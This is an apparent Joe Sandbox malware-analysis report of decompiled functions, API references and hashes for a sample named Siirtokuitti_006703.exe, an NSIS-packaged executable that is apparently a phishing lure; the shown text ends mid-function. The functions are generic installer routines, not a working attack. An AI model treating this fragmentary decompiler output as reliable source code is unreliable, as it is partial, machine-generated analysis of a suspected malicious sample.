                                                                                                                      			E00405C81(WCHAR* _a4) {
                                                                                                                      				WCHAR* _t9;
                                                                                                                      
                                                                                                                      				_t9 = _a4;
                                                                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                                      				_push(_t9);
                                                                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                                                                      					lstrcatW(_t9, 0x40a014);
                                                                                                                      				}
                                                                                                                      				return _t9;
                                                                                                                      			}




                                                                                                                      0x00405c82
                                                                                                                      0x00405c8f
                                                                                                                      0x00405c90
                                                                                                                      0x00405c9b
                                                                                                                      0x00405ca3
                                                                                                                      0x00405ca3
                                                                                                                      0x00405cab

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA3
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                      • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                                                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                      • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 84%
                                                                                                                      			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                                      				void* _v8;
                                                                                                                      				short _v532;
                                                                                                                      				void* _t19;
                                                                                                                      				signed int _t26;
                                                                                                                      				intOrPtr* _t28;
                                                                                                                      				signed int _t33;
                                                                                                                      				signed int _t34;
                                                                                                                      				signed int _t35;
                                                                                                                      
                                                                                                                      				_t34 = _a12;
                                                                                                                      				_t35 = _t34 & 0x00000300;
                                                                                                                      				_t33 = _t34 & 0x00000001;
                                                                                                                      				_t19 = E0040621D(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
                                                                                                                      				if(_t19 == 0) {
                                                                                                                      					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                                                                                      						__eflags = _t33;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							RegCloseKey(_v8);
                                                                                                                      							return 1;
                                                                                                                      						}
                                                                                                                      						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
                                                                                                                      						__eflags = _t26;
                                                                                                                      						if(_t26 != 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					RegCloseKey(_v8);
                                                                                                                      					_t28 = E0040678A(3);
                                                                                                                      					if(_t28 == 0) {
                                                                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                                                                      					}
                                                                                                                      					return  *_t28(_a4, _a8, _t35, 0);
                                                                                                                      				}
                                                                                                                      				return _t19;
                                                                                                                      			}











                                                                                                                      0x00402d35
                                                                                                                      0x00402d3e
                                                                                                                      0x00402d47
                                                                                                                      0x00402d53
                                                                                                                      0x00402d5a
                                                                                                                      0x00402d7e
                                                                                                                      0x00402d64
                                                                                                                      0x00402d66
                                                                                                                      0x00402db9
                                                                                                                      0x00000000
                                                                                                                      0x00402dc1
                                                                                                                      0x00402d75
                                                                                                                      0x00402d7a
                                                                                                                      0x00402d7c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00402d7c
                                                                                                                      0x00402d98
                                                                                                                      0x00402da0
                                                                                                                      0x00402da7
                                                                                                                      0x00000000
                                                                                                                      0x00402dca
                                                                                                                      0x00000000
                                                                                                                      0x00402db2
                                                                                                                      0x00402dd4

                                                                                                                      APIs
                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$Enum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 464197530-0
                                                                                                                      • Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                                                                      • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                                                                      • Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                                                                      • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 53%
                                                                                                                      			E00405D89(void* __eflags, intOrPtr _a4) {
                                                                                                                      				int _t11;
                                                                                                                      				signed char* _t12;
                                                                                                                      				intOrPtr _t18;
                                                                                                                      				intOrPtr* _t21;
                                                                                                                      				signed int _t23;
                                                                                                                      
                                                                                                                      				E004063B0(0x425f30, _a4);
                                                                                                                      				_t21 = E00405D2C(0x425f30);
                                                                                                                      				if(_t21 != 0) {
                                                                                                                      					E00406644(_t21);
                                                                                                                      					if(( *0x42a25c & 0x00000080) == 0) {
                                                                                                                      						L5:
                                                                                                                      						_t23 = _t21 - 0x425f30 >> 1;
                                                                                                                      						while(1) {
                                                                                                                      							_t11 = lstrlenW(0x425f30);
                                                                                                                      							_push(0x425f30);
                                                                                                                      							if(_t11 <= _t23) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							_t12 = E004066F3();
                                                                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                      								E00405CCD(0x425f30);
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						E00405C81();
                                                                                                                      						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                                                      					}
                                                                                                                      					_t18 =  *_t21;
                                                                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                      						goto L1;
                                                                                                                      					} else {
                                                                                                                      						goto L5;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				L1:
                                                                                                                      				return 0;
                                                                                                                      			}








                                                                                                                      0x00405d95
                                                                                                                      0x00405da0
                                                                                                                      0x00405da4
                                                                                                                      0x00405dab
                                                                                                                      0x00405db7
                                                                                                                      0x00405dc7
                                                                                                                      0x00405dc9
                                                                                                                      0x00405de1
                                                                                                                      0x00405de2
                                                                                                                      0x00405de9
                                                                                                                      0x00405dea
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405dcd
                                                                                                                      0x00405dd4
                                                                                                                      0x00405ddc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405dd4
                                                                                                                      0x00405dec
                                                                                                                      0x00000000
                                                                                                                      0x00405e00
                                                                                                                      0x00405db9
                                                                                                                      0x00405dbf
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405dbf
                                                                                                                      0x00405da6
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75832EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75832EE0,00000000), ref: 00405D3A
                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75832EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75832EE0,00000000), ref: 00405DE2
                                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75832EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75832EE0), ref: 00405DF2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                      • String ID: 0_B
                                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                                      • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                      • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                                                                      • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                      • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405995(WCHAR* _a4) {
                                                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                                                      				int _t7;
                                                                                                                      
                                                                                                                      				0x426730->cb = 0x44;
                                                                                                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20);
                                                                                                                      				if(_t7 != 0) {
                                                                                                                      					CloseHandle(_v20.hThread);
                                                                                                                      					return _v20.hProcess;
                                                                                                                      				}
                                                                                                                      				return _t7;
                                                                                                                      			}





                                                                                                                      0x0040599e
                                                                                                                      0x004059be
                                                                                                                      0x004059c6
                                                                                                                      0x004059cb
                                                                                                                      0x00000000
                                                                                                                      0x004059d1
                                                                                                                      0x004059d5

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                      Strings
                                                                                                                      • Error launching installer, xrefs: 004059A8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                      • String ID: Error launching installer
                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                      • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                      • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00403A29() {
                                                                                                                      				void* _t2;
                                                                                                                      				void* _t3;
                                                                                                                      				void* _t6;
                                                                                                                      				void* _t8;
                                                                                                                      
                                                                                                                      				_t8 =  *0x4216ec;
                                                                                                                      				_t3 = E00403A0E(_t2, 0);
                                                                                                                      				if(_t8 != 0) {
                                                                                                                      					do {
                                                                                                                      						_t6 = _t8;
                                                                                                                      						_t8 =  *_t8;
                                                                                                                      						FreeLibrary( *(_t6 + 8));
                                                                                                                      						_t3 = GlobalFree(_t6);
                                                                                                                      					} while (_t8 != 0);
                                                                                                                      				}
                                                                                                                      				 *0x4216ec =  *0x4216ec & 0x00000000;
                                                                                                                      				return _t3;
                                                                                                                      			}







                                                                                                                      0x00403a2a
                                                                                                                      0x00403a32
                                                                                                                      0x00403a39
                                                                                                                      0x00403a3c
                                                                                                                      0x00403a3c
                                                                                                                      0x00403a3e
                                                                                                                      0x00403a43
                                                                                                                      0x00403a4a
                                                                                                                      0x00403a50
                                                                                                                      0x00403a54
                                                                                                                      0x00403a55
                                                                                                                      0x00403a5d

                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75832EE0,00403A00,75833420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                      • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                      • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 77%
                                                                                                                      			E00405CCD(WCHAR* _a4) {
                                                                                                                      				WCHAR* _t5;
                                                                                                                      				WCHAR* _t7;
                                                                                                                      
                                                                                                                      				_t7 = _a4;
                                                                                                                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                                                      				while( *_t5 != 0x5c) {
                                                                                                                      					_push(_t5);
                                                                                                                      					_push(_t7);
                                                                                                                      					_t5 = CharPrevW();
                                                                                                                      					if(_t5 > _t7) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					break;
                                                                                                                      				}
                                                                                                                      				 *_t5 =  *_t5 & 0x00000000;
                                                                                                                      				return  &(_t5[1]);
                                                                                                                      			}





                                                                                                                      0x00405cce
                                                                                                                      0x00405cd8
                                                                                                                      0x00405cdb
                                                                                                                      0x00405ce1
                                                                                                                      0x00405ce2
                                                                                                                      0x00405ce3
                                                                                                                      0x00405ceb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405ceb
                                                                                                                      0x00405ced
                                                                                                                      0x00405cf5

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Siirtokuitti_006703.exe,C:\Users\user\Desktop\Siirtokuitti_006703.exe,80000000,00000003), ref: 00405CD3
                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Siirtokuitti_006703.exe,C:\Users\user\Desktop\Siirtokuitti_006703.exe,80000000,00000003), ref: 00405CE3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                      • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                                                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                      • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				void* _v0;
                                                                                                                      				void* _t17;
                                                                                                                      				signed int _t19;
                                                                                                                      				void* _t20;
                                                                                                                      				void* _t24;
                                                                                                                      				void* _t26;
                                                                                                                      				void* _t30;
                                                                                                                      				void* _t36;
                                                                                                                      				void* _t38;
                                                                                                                      				void* _t39;
                                                                                                                      				signed int _t41;
                                                                                                                      				void* _t42;
                                                                                                                      				void* _t51;
                                                                                                                      				void* _t52;
                                                                                                                      				signed short* _t54;
                                                                                                                      				void* _t56;
                                                                                                                      				void* _t59;
                                                                                                                      				void* _t61;
                                                                                                                      
                                                                                                                      				 *0x1000406c = _a8;
                                                                                                                      				 *0x10004070 = _a16;
                                                                                                                      				 *0x10004074 = _a12;
                                                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                                                                                      				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                                                                                      				_t17 = E10001243();
                                                                                                                      				_v0 = _t17;
                                                                                                                      				_t52 = _t17;
                                                                                                                      				if( *_t17 == 0) {
                                                                                                                      					L16:
                                                                                                                      					return GlobalFree(_t17);
                                                                                                                      				} else {
                                                                                                                      					do {
                                                                                                                      						_t19 =  *_t52 & 0x0000ffff;
                                                                                                                      						_t42 = 2;
                                                                                                                      						_t54 = _t52 + _t42;
                                                                                                                      						_t61 = _t19 - 0x6c;
                                                                                                                      						if(_t61 > 0) {
                                                                                                                      							_t20 = _t19 - 0x70;
                                                                                                                      							if(_t20 == 0) {
                                                                                                                      								L12:
                                                                                                                      								_t52 = _t54 + _t42;
                                                                                                                      								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                                                                      								L13:
                                                                                                                      								GlobalFree(_t24);
                                                                                                                      								goto L14;
                                                                                                                      							}
                                                                                                                      							_t26 = _t20 - _t42;
                                                                                                                      							if(_t26 == 0) {
                                                                                                                      								L10:
                                                                                                                      								_t52 =  &(_t54[1]);
                                                                                                                      								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      							L7:
                                                                                                                      							if(_t26 == 1) {
                                                                                                                      								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                                                                      								 *_t30 =  *0x10004040;
                                                                                                                      								 *0x10004040 = _t30;
                                                                                                                      								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                                                                                      								_t59 = _t59 + 0xc;
                                                                                                                      							}
                                                                                                                      							goto L14;
                                                                                                                      						}
                                                                                                                      						if(_t61 == 0) {
                                                                                                                      							L17:
                                                                                                                      							_t33 =  *0x10004040;
                                                                                                                      							if( *0x10004040 != 0) {
